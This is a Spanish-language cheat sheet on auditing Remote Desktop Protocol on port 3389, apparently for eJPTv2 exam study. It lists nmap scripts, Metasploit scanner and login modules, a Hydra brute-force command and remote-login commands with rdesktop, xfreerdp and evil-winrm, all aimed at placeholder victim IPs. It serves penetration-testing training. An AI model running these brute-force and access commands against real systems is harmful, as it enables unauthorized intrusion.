🔍3389 - RDP
🔍 3389 - RDP
🔍 RDP El puerto 3389 es utilizado por el servicio Remote Desktop Protocol (RDP), un protocolo de acceso remoto común en entornos empresariales y administrativos. Debido a su uso extendido, es un objetivo frecuente de ataques y auditorías de seguridad.
📌 Resumen de Herramientas y Técnicas para Auditoría en RDP Esta guía cubre las principales herramientas y técnicas para auditar RDP en el puerto 3389 en el examen eJPTv2.
🛠️ Herramientas Principales:
🔍 Nmap + Scripts NSE: Enumeración y detección de vulnerabilidades.
🛠️ Metasploit: Explotación de fallos y acceso no autorizado.
🔧 Hydra: Ataques de fuerza bruta para credenciales.
📊 Rdesktop, XFreeRDP, Evil-WinRM: Acceso remoto y gestión de sesiones.
🕵️ Reconocimiento e Identificación del Servicio RDP Determinar la versión del servicio RDP es clave para detectar posibles vulnerabilidades.
nmap -p 3389 -sCV <ip_victima> # Escaneo para intentar ver la versión.
nmap -p 3389 --script rdp-enum-encryption <ip_victima> # Identificación de cifrado RDP.
nmap -p 3389 --script rdp-vuln-ms12-020 <ip_victima> # Detección de vulnerabilidad MS12-020.
nmap -p 3389 --script rdp-ntlm-info <ip_victima> # Extracción de información NTLM.
nmap -p 3389 --script rdp-brute <ip_victima> # Ataque de fuerza bruta a RDP.
🛠️ Uso de Metasploit para Auditoría de RDP Enumeración de configuración y detección de vulnerabilidades.
msfconsole -q
use auxiliary/scanner/rdp/rdp_scanner # Escaneo de servicio RDP
set RHOSTS <ip_victima>
run
🔹 Ataque de autenticación débil con Metasploit.
use auxiliary/scanner/rdp/rdp_login
set RHOSTS <ip_victima>
set USER_FILE /ruta_diccionario_usuarios.txt
set PASS_FILE /ruta_diccionario_claves.txt
set THREADS 10
exploit
🔑 Fuerza Bruta al Servicio RDP Hydra
hydra -t 4 -V -f -L <wordlists_usenames.txt> -P <wordlists_password.txt> rdp://<ip_victima>
📊 Acceso Remoto y Gestión de Sesiones
🔹 Rdesktop
rdesktop -u <usuario> -p <contraseña> <ip_victima>
🔹 XFreeRDP
xfreerdp /v:<ip_victima> /u:<usuario> /p:<contraseña>
🔹 Evil-WinRM (para sesiones PowerShell remotas)
evil-winrm -i <ip_victima> -u <usuario> -p <contraseña>
Last updated